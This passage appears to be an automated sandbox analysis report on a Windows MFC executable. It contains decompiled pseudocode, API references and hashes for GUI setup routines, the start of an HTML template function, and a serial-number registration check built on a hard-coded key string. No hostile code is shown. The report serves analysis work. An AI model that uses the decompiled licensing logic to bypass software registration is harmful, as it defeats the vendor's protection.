				_t81 =  *0x4557c4; // 0x0
				if(_t81 == 0) {
					_push(0);
					_push(0x461);
					L0043E066();
					L0043E0AE();
					_push(0);
					_t69 = 0x460;
					_push(0x460);
					L0043E066();
					L0043E0AE();
					_push(0);
					_push(0x48c);
					L0043E066();
					L0043E0AE();
				} else {
					_push(1);
					_t69 = 0x460;
					_push( *0x4557e0);
					_push(0x460);
					L0043E2E8();
				}
				if( *0x4557c8 != 0) {
					_push( *((intOrPtr*)(E00429029(_t73 - 0x14, 0xe051))));
					 *(_t73 - 4) = 1;
					_push(0x480);
					L0043E066();
					L0043E15C();
					 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
					L0043DD36();
					_push(0);
					_push(0x464);
					L0043E066();
					L0043E0AE();
					_push(0);
					_push(_t30);
					L0043E066();
					L0043E0AE();
					_push(0);
					_push(0x461);
					L0043E066();
					L0043E0AE();
					_push(0);
					_push(_t69);
					L0043E066();
					L0043E0AE();
				}
				_t24 = 1;
				 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0xc));
				return _t24;
			}

0x0041f000
0x0041f000
0x0041f000
0x0041f007
0x0041f00a
0x0041f011
0x0041f013
0x0041f013
0x0041f01e
0x0041f024
0x0041f026
0x0041f02d
0x0041f032
0x0041f03a
0x0041f03f
0x0041f046
0x0041f061
0x0041f071
0x0041f078
0x0041f0b2
0x0041f0b7
0x0041f0b8
0x0041f0bb
0x0041f0c2
0x0041f07a
0x0041f08a
0x0041f08c
0x0041f090
0x0041f097
0x0041f098
0x0041f09f
0x0041f0a4
0x0041f0ab
0x0041f0ab
0x0041f0c9
0x0041f0cf
0x0041f0e8
0x0041f0e9
0x0041f0f0
0x0041f0f7
0x0041f0fc
0x0041f0fd
0x0041f102
0x0041f105
0x0041f10c
0x0041f111
0x0041f113
0x0041f11a
0x0041f121
0x0041f0d1
0x0041f0d1
0x0041f0d3
0x0041f0d8
0x0041f0e0
0x0041f0e1
0x0041f0e1
0x0041f12d
0x0041f143
0x0041f147
0x0041f14e
0x0041f153
0x0041f15a
0x0041f15f
0x0041f166
0x0041f16b
0x0041f16d
0x0041f174
0x0041f17b
0x0041f180
0x0041f182
0x0041f185
0x0041f18c
0x0041f191
0x0041f193
0x0041f19a
0x0041f1a1
0x0041f1a6
0x0041f1a8
0x0041f1ab
0x0041f1b2
0x0041f1b2
0x0041f1bc
0x0041f1c0
0x0041f1c8

APIs

#3092.MFC42(0000043B), ref: 0041F00A
SendMessageA.USER32(?,00000030,?,00000001), ref: 0041F01E
#1779.MFC42(00000421,00000001,?,00000001,0000043B), ref: 0041F02D
#3092.MFC42(00000463,00000421,00000001,?,00000001,0000043B), ref: 0041F03F
#6199.MFC42(00000463,00000421,00000001,?,00000001,0000043B), ref: 0041F046
strcmp.MSVCRT ref: 0041F061
#800.MFC42 ref: 0041F071
#3092.MFC42(00000465,00000000), ref: 0041F098
#6199.MFC42(00000465,00000000), ref: 0041F09F
#800.MFC42(00000465,00000000), ref: 0041F0AB
#3092.MFC42(00000465,004555BC), ref: 0041F0BB
#6199.MFC42(00000465,004555BC), ref: 0041F0C2
#5951.MFC42(00000460,00000001,00000465,004555BC), ref: 0041F0E1
#3092.MFC42(00000461,00000000,00000465,004555BC), ref: 0041F0F0
#6215.MFC42(00000461,00000000,00000465,004555BC), ref: 0041F0F7
#3092.MFC42(00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F105
#6215.MFC42(00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F10C
#3092.MFC42(0000048C,00000000,00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F11A
#6215.MFC42(0000048C,00000000,00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F121
#3092.MFC42(00000480,00000000,0000048C,00000000,00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F153
#6199.MFC42(00000480,00000000,0000048C,00000000,00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F15A
#800.MFC42(00000480,00000000,0000048C,00000000,00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F166
#3092.MFC42(00000464,00000000,00000480,00000000,0000048C,00000000,00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F174
#6215.MFC42(00000464,00000000,00000480,00000000,0000048C,00000000,00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F17B
#3092.MFC42(00000465,00000000,00000464,00000000,00000480,00000000,0000048C,00000000,00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F185
#6215.MFC42(00000465,00000000,00000464,00000000,00000480,00000000,0000048C,00000000,00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F18C
#3092.MFC42(00000461,00000000,00000465,00000000,00000464,00000000,00000480,00000000,0000048C,00000000,00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F19A
#6215.MFC42(00000461,00000000,00000465,00000000,00000464,00000000,00000480,00000000,0000048C,00000000,00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F1A1
#3092.MFC42(00000460,00000000,00000461,00000000,00000465,00000000,00000464,00000000,00000480,00000000,0000048C,00000000,00000460,00000000,00000461,00000000), ref: 0041F1AB
#6215.MFC42(00000460,00000000,00000461,00000000,00000465,00000000,00000464,00000000,00000480,00000000,0000048C,00000000,00000460,00000000,00000461,00000000), ref: 0041F1B2

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #3092$#6215$#6199$#800$#1779#5951MessageSendstrcmp
String ID:
API String ID: 2233323240-0
Opcode ID: fb308fe734c0cd0ed14a13847d3f71ebc130c88744f2bbf0a63345d03efec386
Instruction ID: 114ddcffc5063350d49c2625a552faa25558cf5a5025833ae7a9e3111e98a9ec
Opcode Fuzzy Hash: fb308fe734c0cd0ed14a13847d3f71ebc130c88744f2bbf0a63345d03efec386
Instruction Fuzzy Hash: 0241E331B01328A7EF28B7B3DD16B6D2576DB89B14F00141EB2026B2D2EEFD4A45821D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D656, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 218
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040D656(void* __ecx, void* __eflags) {
				void* __esi;
				int _t71;
				void* _t72;
				void* _t73;
				struct HINSTANCE__* _t74;
				struct HINSTANCE__* _t76;
				intOrPtr* _t81;
				intOrPtr* _t86;
				long _t89;
				void* _t90;
				intOrPtr* _t91;
				long _t98;
				signed int _t118;
				intOrPtr* _t124;
				intOrPtr _t131;
				struct tagRECT* _t133;
				intOrPtr _t137;
				signed int _t139;
				intOrPtr* _t140;
				void* _t142;
				void* _t144;

				E0043E4E0(0x440010, _t144);
				_t142 = __ecx;
				L0043DF94();
				SetWindowLongA( *(_t142 + 0x454), 0xfffffff0, GetWindowLongA( *(__ecx + 0x454), 0xfffffff0) | 0x00000002);
				_t133 = _t142 + 0x48c;
				GetWindowRect( *(_t142 + 0x2a8), _t133);
				_push(_t133);
				L0043E02A();
				_t71 = InflateRect(_t133, 0xfffffffe, 0xfffffffe);
				_push( *((intOrPtr*)(_t142 + 0x49c)));
				L0043E15C();
				_push(1);
				_push(0x808080);
				_push(0x10101);
				_push(0xefefef);
				_push(_t142);
				_push(1);
				_t72 = L00404F47(_t71, _t142 + 0x31c, _t142);
				_push(1);
				_push(0x808080);
				_push(0x10101);
				_push(0xefefef);
				_push(_t142);
				_push(2);
				_t73 = L00404F47(_t72, _t142 + 0x2c8, _t142);
				_push(1);
				_push(0x808080);
				_push(0x10101);
				_push(0xefefef);
				_push(_t142);
				_push(0x535e);
				_t74 = L00404F47(_t73, _t142 + 0x370, _t142);
				L0043E1C2();
				_push(0x80);
				_push(0xe);
				L0043DD78();
				_t76 = SendMessageA( *(_t142 + 0x20), 0x80, 0, LoadIconA(_t74, 0x80));
				L0043E1C2();
				_push(0x80);
				_push(0xe);
				L0043DD78();
				SendMessageA( *(_t142 + 0x20), 0x80, 1, LoadIconA(_t76, 0x80));
				E0040CF63(_t142 + 0x174, 0x323232, 1);
				_t81 = E00429029(_t144 - 0x10, 0xe036);
				 *(_t144 - 4) = 0;
				E0040CF2E(_t142 + 0x174, 2,  *_t81, 0, 0, 1, 0, 0);
				 *(_t144 - 4) =  *(_t144 - 4) | 0xffffffff;
				L0043DD36();
				E0040CF63(_t142 + 0x60, 0x323232, 1);
				_t86 = E00429029(_t144 - 0x10, 0xe026);
				_t118 = 1;
				 *(_t144 - 4) = _t118;
				E0040CF2E(_t142 + 0x60, 5,  *_t86, 0, 0, _t118, 0, 0);
				 *(_t144 - 4) =  *(_t144 - 4) | 0xffffffff;
				L0043DD36();
				_t89 = GetSysColor(0xf);
				_push("Verdana");
				 *(_t142 + 0x414) = _t89;
				 *((intOrPtr*)(_t142 + 0x40c)) = 0x2bc;
				 *((intOrPtr*)(_t142 + 0x408)) = 0xe;
				L0043DDD2();
				_push( *((intOrPtr*)(_t142 + 0x4a0)));
				L0043DDD2();
				 *(_t144 - 0x10) = 0;
				if( *((intOrPtr*)(_t142 + 0x47c)) <= 0) {
					L5:
					_t137 =  *((intOrPtr*)(_t142 + 0x4a4));
					if(_t137 != 0) {
						_t131 =  *((intOrPtr*)(_t142 + 0x47c));
						 *(_t144 - 0x10) = 0;
						if(_t131 <= 0) {
							L15:
							_t90 = 1;
							 *[fs:0x0] =  *((intOrPtr*)(_t144 - 0xc));
							return _t90;
						}
						_t124 =  *((intOrPtr*)(_t142 + 0x478));
						while(1) {
							_t91 =  *_t124;
							if(_t91 != 0 &&  *_t91 == _t137) {
								break;
							}
							 *(_t144 - 0x10) =  *(_t144 - 0x10) + 1;
							_t124 = _t124 + 4;
							if( *(_t144 - 0x10) < _t131) {
								continue;
							}
							goto L15;
						}
						_t139 =  *(_t144 - 0x10);
						E0040DA41(_t142, _t139);
						 *(_t142 + 0x488) = _t139;
						goto L15;
					}
					if(E0040DA41(_t142, 0) != 0) {
						 *(_t142 + 0x488) = 0;
					}
					goto L15;
				} else {
					goto L1;
				}
				do {
					L1:
					_t140 =  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x478)) +  *(_t144 - 0x10) * 4));
					if(_t140 != 0) {
						 *(_t144 - 0x48) = E0040D90E(_t142,  *((intOrPtr*)(_t140 + 8)));
						 *(_t144 - 0x30) =  *(_t144 - 0x30) | 0xffffffff;
						 *((intOrPtr*)(_t144 - 0x44)) = 0xffff0002;
						 *((intOrPtr*)(_t144 - 0x2c)) = 0;
						 *((intOrPtr*)(_t144 - 0x1c)) = _t140;
						 *((intOrPtr*)(_t144 - 0x40)) = 5;
						_t98 = SendMessageA( *(_t142 + 0x454), 0x1100, 0, _t144 - 0x48);
						 *(_t144 - 0x14) = _t98;
						if(_t98 != 0) {
							 *(E0040DECC(_t142 + 0x4a8,  *_t140)) =  *(_t144 - 0x14);
						}
					}
					 *(_t144 - 0x10) =  *(_t144 - 0x10) + 1;
				} while ( *(_t144 - 0x10) <  *((intOrPtr*)(_t142 + 0x47c)));
				goto L5;
			}

0x0040d65b
0x0040d666
0x0040d668
0x0040d687
0x0040d68d
0x0040d69a
0x0040d6a0
0x0040d6a3
0x0040d6ad
0x0040d6b3
0x0040d6bb
0x0040d6c0
0x0040d6c7
0x0040d6d1
0x0040d6d2
0x0040d6d3
0x0040d6d4
0x0040d6dc
0x0040d6e1
0x0040d6e3
0x0040d6e8
0x0040d6e9
0x0040d6ea
0x0040d6eb
0x0040d6f3
0x0040d6f8
0x0040d6fa
0x0040d6ff
0x0040d700
0x0040d701
0x0040d702
0x0040d70d
0x0040d712
0x0040d71c
0x0040d71d
0x0040d720
0x0040d734
0x0040d73a
0x0040d73f
0x0040d740
0x0040d743
0x0040d756
0x0040d76a
0x0040d778
0x0040d790
0x0040d793
0x0040d798
0x0040d79f
0x0040d7aa
0x0040d7b8
0x0040d7c3
0x0040d7c9
0x0040d7d2
0x0040d7d7
0x0040d7de
0x0040d7e5
0x0040d7eb
0x0040d7f6
0x0040d7fc
0x0040d806
0x0040d810
0x0040d815
0x0040d821
0x0040d82c
0x0040d82f
0x0040d8a3
0x0040d8a3
0x0040d8ab
0x0040d8c1
0x0040d8c7
0x0040d8cc
0x0040d8fc
0x0040d901
0x0040d905
0x0040d90d
0x0040d90d
0x0040d8ce
0x0040d8d4
0x0040d8d4
0x0040d8d8
0x00000000
0x00000000
0x0040d8de
0x0040d8e1
0x0040d8e7
0x00000000
0x00000000
0x00000000
0x0040d8e9
0x0040d8eb
0x0040d8f1
0x0040d8f6
0x00000000
0x0040d8f6
0x0040d8b7
0x0040d8b9
0x0040d8b9
0x00000000
0x00000000
0x00000000
0x00000000
0x0040d831
0x0040d831
0x0040d83a
0x0040d83f
0x0040d84b
0x0040d84e
0x0040d855
0x0040d863
0x0040d86c
0x0040d86f
0x0040d876
0x0040d87e
0x0040d881
0x0040d893
0x0040d893
0x0040d881
0x0040d895
0x0040d89b
0x00000000

APIs

__EH_prolog.LIBCMT ref: 0040D65B
#4710.MFC42 ref: 0040D668
GetWindowLongA.USER32 ref: 0040D675
SetWindowLongA.USER32 ref: 0040D687
GetWindowRect.USER32 ref: 0040D69A
#6880.MFC42(?), ref: 0040D6A3
InflateRect.USER32(?,000000FE,000000FE), ref: 0040D6AD
#6199.MFC42(?), ref: 0040D6BB
#1168.MFC42(?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?), ref: 0040D712
#1146.MFC42(00000080,0000000E,00000080,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101), ref: 0040D720
LoadIconA.USER32(00000000,00000080), ref: 0040D726
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040D734
#1168.MFC42(?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?), ref: 0040D73A
#1146.MFC42(00000080,0000000E,00000080,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101), ref: 0040D743
LoadIconA.USER32(00000000,00000080), ref: 0040D749
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040D756

Part of subcall function 0040CF63: InvalidateRect.USER32(?,00000000,00000001), ref: 0040CF7B

Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A

#800.MFC42(?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?), ref: 0040D79F
#800.MFC42(?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?), ref: 0040D7DE
GetSysColor.USER32(0000000F), ref: 0040D7E5
#860.MFC42 ref: 0040D810
#860.MFC42(?), ref: 0040D821
SendMessageA.USER32(?,00001100,00000000,?), ref: 0040D876

Strings

222, xrefs: 0040D764
Verdana, xrefs: 0040D7EB

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #1168LoadMessageRectSendWindow$#1146#800#860IconLong$#4710#537#6199#6880ColorH_prologInflateInvalidateString
String ID: 222$Verdana
API String ID: 359381756-2915611299
Opcode ID: b0662d16579d0ec98cf9fd69a4cca89934458d332b1a3a97f616bf490a4ff534
Instruction ID: 11db7a75c21a29c48b88e5a492485a2d3a1a4e4e851043c482f94ed88d9c66cf
Opcode Fuzzy Hash: b0662d16579d0ec98cf9fd69a4cca89934458d332b1a3a97f616bf490a4ff534
Instruction Fuzzy Hash: 178172B1A00605AFD720AF61CC86FAFB7B9FF85714F10452EF166A62D1CB742945CB18

Uniqueness

Uniqueness Score: -1.00%

Function 0041ADDB, Relevance: 42.1, APIs: 21, Strings: 3, Instructions: 148
stringCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E0041ADDB(void* __ecx) {
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t86;
				void* _t98;
				void* _t106;

				E0043E4E0(0x4414d0, _t106);
				_push(0x32);
				_push(_t106 - 0xb4);
				_push(0xd6d9);
				L0043E078();
				if( *((char*)(_t106 - 0xb4)) != 0) {
					_t98 = 0xa;
					_push(_t98);
					_push(_t106 - 0x4c);
					_push(0xd6da);
					L0043E078();
					_push(_t98);
					_push(_t106 - 0x28);
					_push(0xd6db);
					L0043E078();
					_push(_t98);
					_push(_t106 - 0x40);
					_push(0xd6dc);
					L0043E078();
					_push(_t98);
					_push(_t106 - 0x34);
					_push(0xd6dd);
					_t86 = __ecx;
					L0043E078();
					lstrcpyA(_t106 - 0x80, _t106 - 0x4c);
					lstrcatA(_t106 - 0x80, _t106 - 0x28);
					lstrcatA(_t106 - 0x80, _t106 - 0x40);
					lstrcatA(_t106 - 0x80, _t106 - 0x34);
					E0041AD0E(_t86, _t106 - 0xb4, "_r <()<1-Z2[l5,^", _t106 - 0xe8);
					if(lstrcmpiA(_t106 - 0xe8, _t106 - 0x80) != 0) {
						_push(0x40);
						_push("Registration error");
						_push("Registration code or user name is invalid. Please check all fields and try again!");
						L0043E2EE();
						Sleep(0x12c);
						goto L5;
					} else {
						_t71 = E00429029(_t106 - 0x1c, 0xe06c);
						 *(_t106 - 4) = 2;
						_t73 = E00429029(_t106 - 0x14, 0xe063);
						_push(0x40);
						_push( *_t71);
						_push( *_t73);
						 *(_t106 - 4) = 3;
						L0043E2EE();
						 *(_t106 - 4) = 2;
						L0043DD36();
						 *(_t106 - 4) =  *(_t106 - 4) | 0xffffffff;
						L0043DD36();
						_push(_t106 - 0xb4);
						L0043DDD2();
						_push(_t106 - 0x80);
						L0043DDD2();
						_push(1);
						_pop(0);
					}
				} else {
					_t78 = E00429029(_t106 - 0x10, 0xe062);
					 *(_t106 - 4) =  *(_t106 - 4) & 0x00000000;
					_t80 = E00429029(_t106 - 0x18, 0xe01e);
					_push(0x40);
					_push( *_t78);
					_push( *_t80);
					 *(_t106 - 4) = 1;
					L0043E2EE();
					 *(_t106 - 4) =  *(_t106 - 4) & 0x00000000;
					L0043DD36();
					 *(_t106 - 4) =  *(_t106 - 4) | 0xffffffff;
					L0043DD36();
					L5:
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t106 - 0xc));
				return 0;
			}

0x0041ade0
0x0041adf3
0x0041adf5
0x0041adf8
0x0041adfd
0x0041ae09
0x0041ae63
0x0041ae66
0x0041ae67
0x0041ae68
0x0041ae6d
0x0041ae75
0x0041ae76
0x0041ae77
0x0041ae7e
0x0041ae86
0x0041ae87
0x0041ae88
0x0041ae8f
0x0041ae97
0x0041ae98
0x0041ae99
0x0041ae9e
0x0041aea0
0x0041aead
0x0041aec1
0x0041aecb
0x0041aed5
0x0041aeea
0x0041af05
0x0041af78
0x0041af7a
0x0041af7f
0x0041af86
0x0041af90
0x00000000
0x0041af07
0x0041af10
0x0041af20
0x0041af27
0x0041af31
0x0041af33
0x0041af34
0x0041af37
0x0041af3b
0x0041af43
0x0041af47
0x0041af4c
0x0041af53
0x0041af61
0x0041af62
0x0041af6d
0x0041af6e
0x0041af73
0x0041af75
0x0041af75
0x0041ae0b
0x0041ae14
0x0041ae1b
0x0041ae28
0x0041ae32
0x0041ae34
0x0041ae35
0x0041ae38
0x0041ae3c
0x0041ae41
0x0041ae48
0x0041ae4d
0x0041ae54
0x0041af96
0x0041af96
0x0041af9d
0x0041afa5

APIs

__EH_prolog.LIBCMT ref: 0041ADE0
#3098.MFC42(0000D6D9,?,00000032), ref: 0041ADFD
#4224.MFC42(?,?,00000040,?,00000032), ref: 0041AE3C
#800.MFC42(?,?,00000040,?,00000032), ref: 0041AE48
#800.MFC42(?,?,00000040,?,00000032), ref: 0041AE54
#3098.MFC42(0000D6DA,?,0000000A,0000D6D9,?,00000032), ref: 0041AE6D
#3098.MFC42(0000D6DB,?,0000000A,0000D6DA,?,0000000A,0000D6D9,?,00000032), ref: 0041AE7E
#3098.MFC42(0000D6DC,?,0000000A,0000D6DB,?,0000000A,0000D6DA,?,0000000A,0000D6D9,?,00000032), ref: 0041AE8F
#3098.MFC42(0000D6DD,?,0000000A,0000D6DC,?,0000000A,0000D6DB,?,0000000A,0000D6DA,?,0000000A,0000D6D9,?,00000032), ref: 0041AEA0
lstrcpyA.KERNEL32(?,?,0000D6DD,?,0000000A,0000D6DC,?,0000000A,0000D6DB,?,0000000A,0000D6DA,?,0000000A,0000D6D9,?), ref: 0041AEAD
lstrcatA.KERNEL32(?,?), ref: 0041AEC1
lstrcatA.KERNEL32(?,?), ref: 0041AECB
lstrcatA.KERNEL32(?,?), ref: 0041AED5
lstrcmpiA.KERNEL32(?,?), ref: 0041AEFD
#4224.MFC42(?,74B481D0,00000040), ref: 0041AF3B
#800.MFC42(?,74B481D0,00000040), ref: 0041AF47
#800.MFC42(?,74B481D0,00000040), ref: 0041AF53
#860.MFC42(00000000,?,74B481D0,00000040), ref: 0041AF62
#860.MFC42(?,00000000,?,74B481D0,00000040), ref: 0041AF6E

Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A

Strings

Registration code or user name is invalid. Please check all fields and try again!, xrefs: 0041AF7F
Registration error, xrefs: 0041AF7A
_r <()<1-Z2[l5,^, xrefs: 0041AEE4

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #3098$#800$lstrcat$#4224#860$#1168#537H_prologLoadStringlstrcmpilstrcpy
String ID: Registration code or user name is invalid. Please check all fields and try again!$Registration error$_r <()<1-Z2[l5,^
API String ID: 3333420258-1240730675
Opcode ID: 8d2f217ab8c9626e3f1c29d11ae397607f8a1332d05e73de8db5ae784aa09371
Instruction ID: a97a94cf76e351288f84a6b7e3f6c8cccd7e804ea28f3b41527378bcaf2da925
Opcode Fuzzy Hash: 8d2f217ab8c9626e3f1c29d11ae397607f8a1332d05e73de8db5ae784aa09371
Instruction Fuzzy Hash: AE5140B1E01218AADB14EBE5DC46FEE77BCAB49704F00045BF205E71C1DB789A45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0042A486, Relevance: 42.1, APIs: 21, Strings: 3, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E0042A486(void* __edx) {
				signed int _t63;
				intOrPtr* _t64;
				intOrPtr* _t66;
				void* _t69;
				signed int _t70;
				intOrPtr _t71;
				void* _t74;
				intOrPtr* _t76;
				void* _t81;
				void* _t84;
				intOrPtr _t85;
				void* _t107;
				void* _t110;
				void* _t112;

				_t107 = __edx;
				E0043E4E0(0x4431d4, _t112);
				__imp__CoInitialize(0, _t81);
				if(E00429112() != 0) {
					_t84 = _t112 - 0x10;
					L0043DDD8();
					__eflags =  *(_t112 + 0x10);
					 *(_t112 - 4) = 0;
					if( *(_t112 + 0x10) != 0) {
						__eflags =  *(_t112 + 0x10) - 1;
						if(__eflags != 0) {
							__eflags =  *(_t112 + 0x10) - 2;
							if( *(_t112 + 0x10) != 2) {
								_t63 =  *(_t112 + 0x10);
							} else {
								_push(_t112 - 0x10);
								_push( *((intOrPtr*)(_t112 + 8)));
								_t63 = E00429A65(_t107);
								goto L8;
							}
						} else {
							_push(_t112 - 0x10);
							_push( *((intOrPtr*)(_t112 + 8)));
							_t63 = E00429FDA(_t84, __eflags);
							goto L8;
						}
					} else {
						_push(_t112 - 0x10);
						_push( *((intOrPtr*)(_t112 + 8)));
						_t63 = E004292F3(_t107);
						L8:
					}
					__eflags = _t63;
					_t64 =  *0x455b54; // 0x0
					_push(_t64);
					_t85 =  *_t64;
					if(_t63 != 0) {
						 *((intOrPtr*)(_t85 + 8))();
						_t66 =  *0x455b50; // 0x0
						 *((intOrPtr*)( *_t66 + 8))(_t66);
						__imp__CoUninitialize();
						 *0x455b54 = 0;
						 *0x455b50 = 0;
						_t69 = E0042980F(_t112 - 0x14,  *_t66, _t112 - 0x14, "HTML_TEMPLATE", 0x17);
						_push("</BODY>");
						 *(_t112 - 4) = 1;
						L0043DFD6();
						_push( *((intOrPtr*)(_t112 - 0x10)));
						_push(_t69);
						L0043E4C2();
						L0043E486();
						 *(_t112 - 4) = 2;
						L0043DDDE();
						 *(_t112 - 4) = 3;
						L0043DDD8();
						 *(_t112 - 0x1c) =  *(_t112 - 0x1c) | 0xffffffff;
						_push(0);
						 *(_t112 - 4) = 4;
						 *(_t112 - 0x28) = 0x445490;
						 *((intOrPtr*)(_t112 - 0x20)) = 0;
						L0043DDD2();
						_t70 = _t112 - 0x28;
						_push(_t70);
						_push(0x1001);
						_push( *((intOrPtr*)(_t112 + 0xc)));
						 *(_t112 - 4) = 5;
						L0043E480();
						__eflags = _t70;
						if(_t70 != 0) {
							_t71 =  *((intOrPtr*)(_t112 - 0x14));
							_push( *((intOrPtr*)(_t71 - 8)));
							_push(_t71);
